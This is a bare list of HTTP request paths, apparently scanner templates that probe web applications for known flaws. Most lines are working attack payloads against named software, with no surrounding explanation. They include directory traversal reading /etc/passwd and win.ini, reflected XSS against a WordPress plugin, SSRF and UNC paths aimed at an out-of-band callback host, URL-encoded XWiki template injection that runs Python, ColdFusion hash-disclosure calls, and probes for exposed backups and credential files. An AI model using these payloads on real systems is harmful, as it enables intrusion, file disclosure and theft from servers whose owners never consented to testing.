/images//////////////////../../../../../../../../etc/passwd
/RP?wsrp-url=file:///etc/passwd
/RP?wsrp-url=file:///c:\\windows\\win.ini
/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>
/%255c%255c{{interactsh-url}}%255cC$%255cbb
/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime
/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime
/v1/avatars/favicon?url=http://{{interactsh-url}}
/_admin/imgdownload.php?filename=imgdownload.php
/tshirtecommerce/ajax.php?type=svg
/tshirtecommerce/fonts.php?name=2&type=./../index.php
/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini
//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd
/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd
/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php
/api/dns
/wp-json/igd/v1/get-users-data
/assets/built%2F..%2F..%2F/package.json
/assets/built%2F..%2F..%2F%E0%A4%A/package.json
/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd
/public/ticket/ajax/ajax.php?action=getContacts&email=%
/static/..%5c..%5c..%5c..%5cetc/passwd
/download/{{repeat(
/api/v1/slack/image/slack-image{{repeat(
/cgi-bin/exportCfgwithpasswd
/excel.php
/pos-kasir-php/excel.php
/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view
/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki
/.cpr/%2Fetc%2Fpasswd
/modules/
/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/DownloadWindow.php?filename=../../../../../../../../etc/passwd
/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash

/../../../../etc/passwd
/modules/simpleimportproduct/send.php?phpinfo=1
/modules/updateproducts/send.php?phpinfo=1
/{{route}}
/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=
/api/sys/set_passwd
/opencms/cmisatom/cmis-online/query
/cmisatom/cmis-online/query
/lang/log/httpd.log
/api/2.0/preview/mlflow/experiments/list
/api/Image/withpath/C:\Windows\win.ini
/api/sys/login
/uploads/
/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/cgi-bin/MANGA/index.cgi
/wp-content/ldap-authentication-report.csv
/static/js/../../../../../../../../../../../../../../etc/passwd
/nodes?view=summary
/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000
/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd
/wp-content/plugins/wp-fastest-cache/readme.txt
/wp-content/backups-dup-lite/tmp/
/wp-content/backups-dup-pro/tmp/
/wp-content/uploads/prime-mover-export-files/1/
/wp-content/uploads/
/blog/wp-content/uploads/
/wordpress/wp-content/uploads/
/wp/wp-content/uploads/
/wp-content/uploads/{{backupfolder}}/
